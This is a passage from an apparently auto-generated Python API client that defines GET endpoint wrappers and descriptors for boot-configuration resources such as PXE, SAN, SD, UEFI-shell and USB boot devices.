            server defaults to "allpages"
        at (str): like '$filter', but matches against versioning
            information properties of the resources. [optional]
        tags (str): request a summary of Tag utilization (tag keys,
            usage counts and assigned values) for this resource.
            [optional]
        _return_http_data_only (bool): return the response data without
            status code and headers. Default is True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse object without reading/decoding the
            body. Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) pair of timeouts. Default is None.
        _check_input_type (bool): type-check the data sent to the
            server. Default is True.
        _check_return_type (bool): type-check the data received from
            the server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute the request asynchronously.

    Returns:
        BootPrecisionPolicyResponse, or the request thread when called
        asynchronously.
    """
    # Fill in the standard request-control options the caller did not
    # supply explicitly.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor for GET /api/v1/boot/PrecisionPolicies; dispatches to
# the private request builder above via call_with_http_info.
self.get_boot_precision_policy_list = _Endpoint(
    settings={
        'response_type': (BootPrecisionPolicyResponse,),
        # Fix: the generated auth list contained 'oAuth2' twice; the
        # duplicate is removed (applying the same scheme twice is redundant).
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2'
        ],
        'endpoint_path': '/api/v1/boot/PrecisionPolicies',
        'operation_id': 'get_boot_precision_policy_list',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        # All parameters are optional query parameters.
        'all': [
            'filter', 'orderby', 'top', 'skip', 'select', 'expand',
            'apply', 'count', 'inlinecount', 'at', 'tags',
        ],
        'required': [],
        'nullable': [],
        'enum': ['inlinecount'],
        'validation': []
    },
    root_map={
        'validations': {},
        'allowed_values': {
            ('inlinecount',): {
                "ALLPAGES": "allpages",
                "NONE": "none"
            },
        },
        'openapi_types': {
            'filter': (str,),
            'orderby': (str,),
            'top': (int,),
            'skip': (int,),
            'select': (str,),
            'expand': (str,),
            'apply': (str,),
            'count': (bool,),
            'inlinecount': (str,),
            'at': (str,),
            'tags': (str,),
        },
        # OData-style query options are prefixed with '$' on the wire.
        'attribute_map': {
            'filter': '$filter',
            'orderby': '$orderby',
            'top': '$top',
            'skip': '$skip',
            'select': '$select',
            'expand': '$expand',
            'apply': '$apply',
            'count': '$count',
            'inlinecount': '$inlinecount',
            'at': 'at',
            'tags': 'tags',
        },
        # Every parameter of this operation travels in the query string.
        'location_map': {
            param: 'query'
            for param in (
                'filter', 'orderby', 'top', 'skip', 'select', 'expand',
                'apply', 'count', 'inlinecount', 'at', 'tags',
            )
        },
        'collection_format_map': {}
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_boot_precision_policy_list
)
def __get_boot_pxe_device_by_moid(
    self,
    moid,
    **kwargs
):
    """Read a 'boot.PxeDevice' resource.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, pass async_req=True.

    >>> thread = api.get_boot_pxe_device_by_moid(moid, async_req=True)
    >>> result = thread.get()

    Args:
        moid (str): The unique Moid identifier of a resource instance.

    Keyword Args:
        _return_http_data_only (bool): return the response body only,
            without status code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse is
            returned without reading/decoding its data. Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) pair of timeouts. Default is None.
        _check_input_type (bool): type-check the data sent to the
            server. Default is True.
        _check_return_type (bool): type-check the data received from
            the server. Default is True.
        _host_index (int/None): index of the server to use. By default
            it is read from the configuration.
        async_req (bool): execute the request asynchronously.

    Returns:
        BootPxeDevice, or the request thread when called with
        async_req=True.
    """
    # Fill in the standard call options, keeping any caller overrides.
    option_defaults = (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    )
    for option, default in option_defaults:
        kwargs.setdefault(option, default)
    kwargs['moid'] = moid
    return self.call_with_http_info(**kwargs)
# Public endpoint object for GET /api/v1/boot/PxeDevices/{Moid}.
# Generated wiring: binds the private callable above to the endpoint
# metadata (response type, auth schemes, parameter and location maps).
# NOTE(review): 'oAuth2' is listed twice in 'auth' — presumably a
# generator artifact; confirm against the OpenAPI document.
self.get_boot_pxe_device_by_moid = _Endpoint(
    settings={
        # Responses are deserialized into this model type.
        'response_type': (BootPxeDevice,),
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2',
            'oAuth2'
        ],
        'endpoint_path': '/api/v1/boot/PxeDevices/{Moid}',
        'operation_id': 'get_boot_pxe_device_by_moid',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': [
            'moid',
        ],
        'required': [
            'moid',
        ],
        'nullable': [
        ],
        'enum': [
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
        },
        'openapi_types': {
            'moid':
                (str,),
        },
        # Python parameter name -> wire name.
        'attribute_map': {
            'moid': 'Moid',
        },
        # 'moid' is substituted into the URL path, not the query string.
        'location_map': {
            'moid': 'path',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_boot_pxe_device_by_moid
)
def __get_boot_pxe_device_list(
    self,
    **kwargs
):
    """Read a 'boot.PxeDevice' resource.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, pass async_req=True.

    >>> thread = api.get_boot_pxe_device_list(async_req=True)
    >>> result = thread.get()

    Keyword Args:
        filter (str): OData-style $filter predicate selecting the
            entries to return. [optional]
        orderby (str): properties used to sort the collection. [optional]
        top (int): maximum number of resources to return. [optional]
        skip (int): number of resources to skip. [optional]
        select (str): subset of properties to return. [optional]
        expand (str): additional attributes or related resources to
            return inline. [optional]
        apply (str): aggregation/grouping transformations ('aggregate',
            'groupby') applied in sequence. [optional]
        count (bool): return only the count of matching resources.
            [optional]
        inlinecount (str): include an inline count ('allpages' or
            'none') with the results. [optional]
        at (str): filter on versioning information properties. [optional]
        tags (str): request a summary of tag-key utilization. [optional]
        _return_http_data_only (bool): return the response body only,
            without status code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse is
            returned without reading/decoding its data. Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) pair of timeouts. Default is None.
        _check_input_type (bool): type-check the data sent to the
            server. Default is True.
        _check_return_type (bool): type-check the data received from
            the server. Default is True.
        _host_index (int/None): index of the server to use. By default
            it is read from the configuration.
        async_req (bool): execute the request asynchronously.

    Returns:
        BootPxeDeviceResponse, or the request thread when called with
        async_req=True.
    """
    # Fill in the standard call options, keeping any caller overrides.
    option_defaults = (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    )
    for option, default in option_defaults:
        kwargs.setdefault(option, default)
    return self.call_with_http_info(**kwargs)
# Public endpoint object for GET /api/v1/boot/PxeDevices.
# Generated wiring: binds the private list callable above to the endpoint
# metadata (response type, auth schemes, query-parameter maps, accept types).
# NOTE(review): 'oAuth2' appears twice in 'auth' — presumably a generator
# artifact; confirm against the OpenAPI document.
self.get_boot_pxe_device_list = _Endpoint(
    settings={
        # Responses are deserialized into this model type.
        'response_type': (BootPxeDeviceResponse,),
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2',
            'oAuth2'
        ],
        'endpoint_path': '/api/v1/boot/PxeDevices',
        'operation_id': 'get_boot_pxe_device_list',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': [
            'filter',
            'orderby',
            'top',
            'skip',
            'select',
            'expand',
            'apply',
            'count',
            'inlinecount',
            'at',
            'tags',
        ],
        'required': [],
        'nullable': [
        ],
        # 'inlinecount' is restricted to the allowed_values below.
        'enum': [
            'inlinecount',
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
            ('inlinecount',): {
                "ALLPAGES": "allpages",
                "NONE": "none"
            },
        },
        'openapi_types': {
            'filter':
                (str,),
            'orderby':
                (str,),
            'top':
                (int,),
            'skip':
                (int,),
            'select':
                (str,),
            'expand':
                (str,),
            'apply':
                (str,),
            'count':
                (bool,),
            'inlinecount':
                (str,),
            'at':
                (str,),
            'tags':
                (str,),
        },
        # Python parameter name -> OData query-option name on the wire.
        'attribute_map': {
            'filter': '$filter',
            'orderby': '$orderby',
            'top': '$top',
            'skip': '$skip',
            'select': '$select',
            'expand': '$expand',
            'apply': '$apply',
            'count': '$count',
            'inlinecount': '$inlinecount',
            'at': 'at',
            'tags': 'tags',
        },
        # Every parameter travels in the query string.
        'location_map': {
            'filter': 'query',
            'orderby': 'query',
            'top': 'query',
            'skip': 'query',
            'select': 'query',
            'expand': 'query',
            'apply': 'query',
            'count': 'query',
            'inlinecount': 'query',
            'at': 'query',
            'tags': 'query',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_boot_pxe_device_list
)
def __get_boot_san_device_by_moid(
    self,
    moid,
    **kwargs
):
    """Read a 'boot.SanDevice' resource.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, pass async_req=True.

    >>> thread = api.get_boot_san_device_by_moid(moid, async_req=True)
    >>> result = thread.get()

    Args:
        moid (str): The unique Moid identifier of a resource instance.

    Keyword Args:
        _return_http_data_only (bool): return the response body only,
            without status code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse is
            returned without reading/decoding its data. Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) pair of timeouts. Default is None.
        _check_input_type (bool): type-check the data sent to the
            server. Default is True.
        _check_return_type (bool): type-check the data received from
            the server. Default is True.
        _host_index (int/None): index of the server to use. By default
            it is read from the configuration.
        async_req (bool): execute the request asynchronously.

    Returns:
        BootSanDevice, or the request thread when called with
        async_req=True.
    """
    # Fill in the standard call options, keeping any caller overrides.
    option_defaults = (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    )
    for option, default in option_defaults:
        kwargs.setdefault(option, default)
    kwargs['moid'] = moid
    return self.call_with_http_info(**kwargs)
# Public endpoint object for GET /api/v1/boot/SanDevices/{Moid}.
# Generated wiring: binds the private callable above to the endpoint
# metadata (response type, auth schemes, parameter and location maps).
# NOTE(review): 'oAuth2' is listed twice in 'auth' — presumably a
# generator artifact; confirm against the OpenAPI document.
self.get_boot_san_device_by_moid = _Endpoint(
    settings={
        # Responses are deserialized into this model type.
        'response_type': (BootSanDevice,),
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2',
            'oAuth2'
        ],
        'endpoint_path': '/api/v1/boot/SanDevices/{Moid}',
        'operation_id': 'get_boot_san_device_by_moid',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': [
            'moid',
        ],
        'required': [
            'moid',
        ],
        'nullable': [
        ],
        'enum': [
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
        },
        'openapi_types': {
            'moid':
                (str,),
        },
        # Python parameter name -> wire name.
        'attribute_map': {
            'moid': 'Moid',
        },
        # 'moid' is substituted into the URL path, not the query string.
        'location_map': {
            'moid': 'path',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_boot_san_device_by_moid
)
def __get_boot_san_device_list(
    self,
    **kwargs
):
    """Read a 'boot.SanDevice' resource.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, pass async_req=True.

    >>> thread = api.get_boot_san_device_list(async_req=True)
    >>> result = thread.get()

    Keyword Args:
        filter (str): OData-style $filter predicate selecting the
            entries to return. [optional]
        orderby (str): properties used to sort the collection. [optional]
        top (int): maximum number of resources to return. [optional]
        skip (int): number of resources to skip. [optional]
        select (str): subset of properties to return. [optional]
        expand (str): additional attributes or related resources to
            return inline. [optional]
        apply (str): aggregation/grouping transformations ('aggregate',
            'groupby') applied in sequence. [optional]
        count (bool): return only the count of matching resources.
            [optional]
        inlinecount (str): include an inline count ('allpages' or
            'none') with the results. [optional]
        at (str): filter on versioning information properties. [optional]
        tags (str): request a summary of tag-key utilization. [optional]
        _return_http_data_only (bool): return the response body only,
            without status code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse is
            returned without reading/decoding its data. Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) pair of timeouts. Default is None.
        _check_input_type (bool): type-check the data sent to the
            server. Default is True.
        _check_return_type (bool): type-check the data received from
            the server. Default is True.
        _host_index (int/None): index of the server to use. By default
            it is read from the configuration.
        async_req (bool): execute the request asynchronously.

    Returns:
        BootSanDeviceResponse, or the request thread when called with
        async_req=True.
    """
    # Fill in the standard call options, keeping any caller overrides.
    option_defaults = (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    )
    for option, default in option_defaults:
        kwargs.setdefault(option, default)
    return self.call_with_http_info(**kwargs)
# Public endpoint object for GET /api/v1/boot/SanDevices.
# Generated wiring: binds the private list callable above to the endpoint
# metadata (response type, auth schemes, query-parameter maps, accept types).
# NOTE(review): 'oAuth2' appears twice in 'auth' — presumably a generator
# artifact; confirm against the OpenAPI document.
self.get_boot_san_device_list = _Endpoint(
    settings={
        # Responses are deserialized into this model type.
        'response_type': (BootSanDeviceResponse,),
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2',
            'oAuth2'
        ],
        'endpoint_path': '/api/v1/boot/SanDevices',
        'operation_id': 'get_boot_san_device_list',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': [
            'filter',
            'orderby',
            'top',
            'skip',
            'select',
            'expand',
            'apply',
            'count',
            'inlinecount',
            'at',
            'tags',
        ],
        'required': [],
        'nullable': [
        ],
        # 'inlinecount' is restricted to the allowed_values below.
        'enum': [
            'inlinecount',
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
            ('inlinecount',): {
                "ALLPAGES": "allpages",
                "NONE": "none"
            },
        },
        'openapi_types': {
            'filter':
                (str,),
            'orderby':
                (str,),
            'top':
                (int,),
            'skip':
                (int,),
            'select':
                (str,),
            'expand':
                (str,),
            'apply':
                (str,),
            'count':
                (bool,),
            'inlinecount':
                (str,),
            'at':
                (str,),
            'tags':
                (str,),
        },
        # Python parameter name -> OData query-option name on the wire.
        'attribute_map': {
            'filter': '$filter',
            'orderby': '$orderby',
            'top': '$top',
            'skip': '$skip',
            'select': '$select',
            'expand': '$expand',
            'apply': '$apply',
            'count': '$count',
            'inlinecount': '$inlinecount',
            'at': 'at',
            'tags': 'tags',
        },
        # Every parameter travels in the query string.
        'location_map': {
            'filter': 'query',
            'orderby': 'query',
            'top': 'query',
            'skip': 'query',
            'select': 'query',
            'expand': 'query',
            'apply': 'query',
            'count': 'query',
            'inlinecount': 'query',
            'at': 'query',
            'tags': 'query',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_boot_san_device_list
)
def __get_boot_sd_device_by_moid(
    self,
    moid,
    **kwargs
):
    """Read a 'boot.SdDevice' resource.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, pass async_req=True.

    >>> thread = api.get_boot_sd_device_by_moid(moid, async_req=True)
    >>> result = thread.get()

    Args:
        moid (str): The unique Moid identifier of a resource instance.

    Keyword Args:
        _return_http_data_only (bool): return the response body only,
            without status code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse is
            returned without reading/decoding its data. Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) pair of timeouts. Default is None.
        _check_input_type (bool): type-check the data sent to the
            server. Default is True.
        _check_return_type (bool): type-check the data received from
            the server. Default is True.
        _host_index (int/None): index of the server to use. By default
            it is read from the configuration.
        async_req (bool): execute the request asynchronously.

    Returns:
        BootSdDevice, or the request thread when called with
        async_req=True.
    """
    # Fill in the standard call options, keeping any caller overrides.
    option_defaults = (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    )
    for option, default in option_defaults:
        kwargs.setdefault(option, default)
    kwargs['moid'] = moid
    return self.call_with_http_info(**kwargs)
# Public endpoint object for GET /api/v1/boot/SdDevices/{Moid}.
# Generated wiring: binds the private callable above to the endpoint
# metadata (response type, auth schemes, parameter and location maps).
# NOTE(review): 'oAuth2' is listed twice in 'auth' — presumably a
# generator artifact; confirm against the OpenAPI document.
self.get_boot_sd_device_by_moid = _Endpoint(
    settings={
        # Responses are deserialized into this model type.
        'response_type': (BootSdDevice,),
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2',
            'oAuth2'
        ],
        'endpoint_path': '/api/v1/boot/SdDevices/{Moid}',
        'operation_id': 'get_boot_sd_device_by_moid',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': [
            'moid',
        ],
        'required': [
            'moid',
        ],
        'nullable': [
        ],
        'enum': [
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
        },
        'openapi_types': {
            'moid':
                (str,),
        },
        # Python parameter name -> wire name.
        'attribute_map': {
            'moid': 'Moid',
        },
        # 'moid' is substituted into the URL path, not the query string.
        'location_map': {
            'moid': 'path',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_boot_sd_device_by_moid
)
def __get_boot_sd_device_list(
    self,
    **kwargs
):
    """Read a 'boot.SdDevice' resource.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, pass async_req=True.

    >>> thread = api.get_boot_sd_device_list(async_req=True)
    >>> result = thread.get()

    Keyword Args:
        filter (str): OData-style $filter predicate selecting the
            entries to return. [optional]
        orderby (str): properties used to sort the collection. [optional]
        top (int): maximum number of resources to return. [optional]
        skip (int): number of resources to skip. [optional]
        select (str): subset of properties to return. [optional]
        expand (str): additional attributes or related resources to
            return inline. [optional]
        apply (str): aggregation/grouping transformations ('aggregate',
            'groupby') applied in sequence. [optional]
        count (bool): return only the count of matching resources.
            [optional]
        inlinecount (str): include an inline count ('allpages' or
            'none') with the results. [optional]
        at (str): filter on versioning information properties. [optional]
        tags (str): request a summary of tag-key utilization. [optional]
        _return_http_data_only (bool): return the response body only,
            without status code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse is
            returned without reading/decoding its data. Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) pair of timeouts. Default is None.
        _check_input_type (bool): type-check the data sent to the
            server. Default is True.
        _check_return_type (bool): type-check the data received from
            the server. Default is True.
        _host_index (int/None): index of the server to use. By default
            it is read from the configuration.
        async_req (bool): execute the request asynchronously.

    Returns:
        BootSdDeviceResponse, or the request thread when called with
        async_req=True.
    """
    # Fill in the standard call options, keeping any caller overrides.
    option_defaults = (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    )
    for option, default in option_defaults:
        kwargs.setdefault(option, default)
    return self.call_with_http_info(**kwargs)
# Public endpoint object for GET /api/v1/boot/SdDevices.
# Generated wiring: binds the private list callable above to the endpoint
# metadata (response type, auth schemes, query-parameter maps, accept types).
# NOTE(review): 'oAuth2' appears twice in 'auth' — presumably a generator
# artifact; confirm against the OpenAPI document.
self.get_boot_sd_device_list = _Endpoint(
    settings={
        # Responses are deserialized into this model type.
        'response_type': (BootSdDeviceResponse,),
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2',
            'oAuth2'
        ],
        'endpoint_path': '/api/v1/boot/SdDevices',
        'operation_id': 'get_boot_sd_device_list',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': [
            'filter',
            'orderby',
            'top',
            'skip',
            'select',
            'expand',
            'apply',
            'count',
            'inlinecount',
            'at',
            'tags',
        ],
        'required': [],
        'nullable': [
        ],
        # 'inlinecount' is restricted to the allowed_values below.
        'enum': [
            'inlinecount',
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
            ('inlinecount',): {
                "ALLPAGES": "allpages",
                "NONE": "none"
            },
        },
        'openapi_types': {
            'filter':
                (str,),
            'orderby':
                (str,),
            'top':
                (int,),
            'skip':
                (int,),
            'select':
                (str,),
            'expand':
                (str,),
            'apply':
                (str,),
            'count':
                (bool,),
            'inlinecount':
                (str,),
            'at':
                (str,),
            'tags':
                (str,),
        },
        # Python parameter name -> OData query-option name on the wire.
        'attribute_map': {
            'filter': '$filter',
            'orderby': '$orderby',
            'top': '$top',
            'skip': '$skip',
            'select': '$select',
            'expand': '$expand',
            'apply': '$apply',
            'count': '$count',
            'inlinecount': '$inlinecount',
            'at': 'at',
            'tags': 'tags',
        },
        # Every parameter travels in the query string.
        'location_map': {
            'filter': 'query',
            'orderby': 'query',
            'top': 'query',
            'skip': 'query',
            'select': 'query',
            'expand': 'query',
            'apply': 'query',
            'count': 'query',
            'inlinecount': 'query',
            'at': 'query',
            'tags': 'query',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_boot_sd_device_list
)
def __get_boot_uefi_shell_device_by_moid(
    self,
    moid,
    **kwargs
):
    """Read a 'boot.UefiShellDevice' resource.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, pass async_req=True.

    >>> thread = api.get_boot_uefi_shell_device_by_moid(moid, async_req=True)
    >>> result = thread.get()

    Args:
        moid (str): The unique Moid identifier of a resource instance.

    Keyword Args:
        _return_http_data_only (bool): return the response body only,
            without status code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse is
            returned without reading/decoding its data. Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) pair of timeouts. Default is None.
        _check_input_type (bool): type-check the data sent to the
            server. Default is True.
        _check_return_type (bool): type-check the data received from
            the server. Default is True.
        _host_index (int/None): index of the server to use. By default
            it is read from the configuration.
        async_req (bool): execute the request asynchronously.

    Returns:
        BootUefiShellDevice, or the request thread when called with
        async_req=True.
    """
    # Fill in the standard call options, keeping any caller overrides.
    option_defaults = (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    )
    for option, default in option_defaults:
        kwargs.setdefault(option, default)
    kwargs['moid'] = moid
    return self.call_with_http_info(**kwargs)
# Public endpoint object for GET /api/v1/boot/UefiShellDevices/{Moid}.
# Generated wiring: binds the private callable above to the endpoint
# metadata (response type, auth schemes, parameter and location maps).
# NOTE(review): 'oAuth2' is listed twice in 'auth' — presumably a
# generator artifact; confirm against the OpenAPI document.
self.get_boot_uefi_shell_device_by_moid = _Endpoint(
    settings={
        # Responses are deserialized into this model type.
        'response_type': (BootUefiShellDevice,),
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2',
            'oAuth2'
        ],
        'endpoint_path': '/api/v1/boot/UefiShellDevices/{Moid}',
        'operation_id': 'get_boot_uefi_shell_device_by_moid',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': [
            'moid',
        ],
        'required': [
            'moid',
        ],
        'nullable': [
        ],
        'enum': [
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
        },
        'openapi_types': {
            'moid':
                (str,),
        },
        # Python parameter name -> wire name.
        'attribute_map': {
            'moid': 'Moid',
        },
        # 'moid' is substituted into the URL path, not the query string.
        'location_map': {
            'moid': 'path',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_boot_uefi_shell_device_by_moid
)
def __get_boot_uefi_shell_device_list(
    self,
    **kwargs
):
    """Read a 'boot.UefiShellDevice' resource. # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_boot_uefi_shell_device_list(async_req=True)
    >>> result = thread.get()
    Keyword Args:
        filter (str): OData-style "$filter" predicate expression that
            selects the subset of resources to return. [optional] if
            omitted the server will use the default value of ""
        orderby (str): Properties used to sort the returned collection.
            [optional]
        top (int): Maximum number of resources to return in the
            response. [optional] if omitted the server will use the
            default value of 100
        skip (int): Number of resources to skip in the response.
            [optional] if omitted the server will use the default
            value of 0
        select (str): Subset of properties to return. [optional] if
            omitted the server will use the default value of ""
        expand (str): Additional attributes or related resources to
            return with the primary resources. [optional]
        apply (str): Sequence of "$apply" set transformations
            ("aggregate", "groupby"), separated by forward slashes and
            applied consecutively. [optional]
        count (bool): Return the count of matching resources instead of
            the resources themselves. [optional]
        inlinecount (str): Request an inline count of the matching
            resources included with the response. [optional] if omitted
            the server will use the default value of "allpages"
        at (str): Like "$filter", but matched against versioning
            information properties of the resources. [optional]
        tags (str): Request a summary of Tag utilization (keys, usage
            counts, assigned values) for this resource. [optional]
        _return_http_data_only (bool): response data without head status
            code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse
            object will be returned without reading/decoding response
            data. Default is True.
        _request_timeout (float/tuple): timeout setting for this
            request. If one number provided, it will be total request
            timeout. It can also be a pair (tuple) of
            (connection, read) timeouts. Default is None.
        _check_input_type (bool): specifies if type checking should be
            done on the data sent to the server. Default is True.
        _check_return_type (bool): specifies if type checking should be
            done on the data received from the server. Default is True.
        _host_index (int/None): specifies the index of the server that
            we want to use. Default is read from the configuration.
        async_req (bool): execute request asynchronously
    Returns:
        BootUefiShellDeviceResponse
        If the method is called asynchronously, returns the request
        thread.
    """
    # Fill in the standard client-side options; dict.setdefault keeps
    # any value the caller supplied explicitly.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor: GET /api/v1/boot/UefiShellDevices. Binds the
# OData-style query parameters to their wire names/locations and
# dispatches to the __get_boot_uefi_shell_device_list wrapper above.
self.get_boot_uefi_shell_device_list = _Endpoint(
    settings={
        'response_type': (BootUefiShellDeviceResponse,),
        # NOTE(review): 'oAuth2' appears twice (generator artifact);
        # redundant but harmless.
        'auth': ['cookieAuth', 'http_signature', 'oAuth2', 'oAuth2'],
        'endpoint_path': '/api/v1/boot/UefiShellDevices',
        'operation_id': 'get_boot_uefi_shell_device_list',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': [
            'filter', 'orderby', 'top', 'skip', 'select', 'expand',
            'apply', 'count', 'inlinecount', 'at', 'tags',
        ],
        'required': [],
        'nullable': [],
        # Only 'inlinecount' is restricted to an enumerated value set.
        'enum': ['inlinecount'],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {
            ('inlinecount',): {
                "ALLPAGES": "allpages",
                "NONE": "none"
            },
        },
        'openapi_types': {
            'filter': (str,),
            'orderby': (str,),
            'top': (int,),
            'skip': (int,),
            'select': (str,),
            'expand': (str,),
            'apply': (str,),
            'count': (bool,),
            'inlinecount': (str,),
            'at': (str,),
            'tags': (str,),
        },
        # Python argument name -> query-parameter name on the wire.
        'attribute_map': {
            'filter': '$filter',
            'orderby': '$orderby',
            'top': '$top',
            'skip': '$skip',
            'select': '$select',
            'expand': '$expand',
            'apply': '$apply',
            'count': '$count',
            'inlinecount': '$inlinecount',
            'at': 'at',
            'tags': 'tags',
        },
        # Every parameter of this operation travels in the query string.
        'location_map': {
            name: 'query'
            for name in (
                'filter', 'orderby', 'top', 'skip', 'select', 'expand',
                'apply', 'count', 'inlinecount', 'at', 'tags',
            )
        },
        'collection_format_map': {},
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_boot_uefi_shell_device_list
)
def __get_boot_usb_device_by_moid(
    self,
    moid,
    **kwargs
):
    """Read a 'boot.UsbDevice' resource. # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_boot_usb_device_by_moid(moid, async_req=True)
    >>> result = thread.get()
    Args:
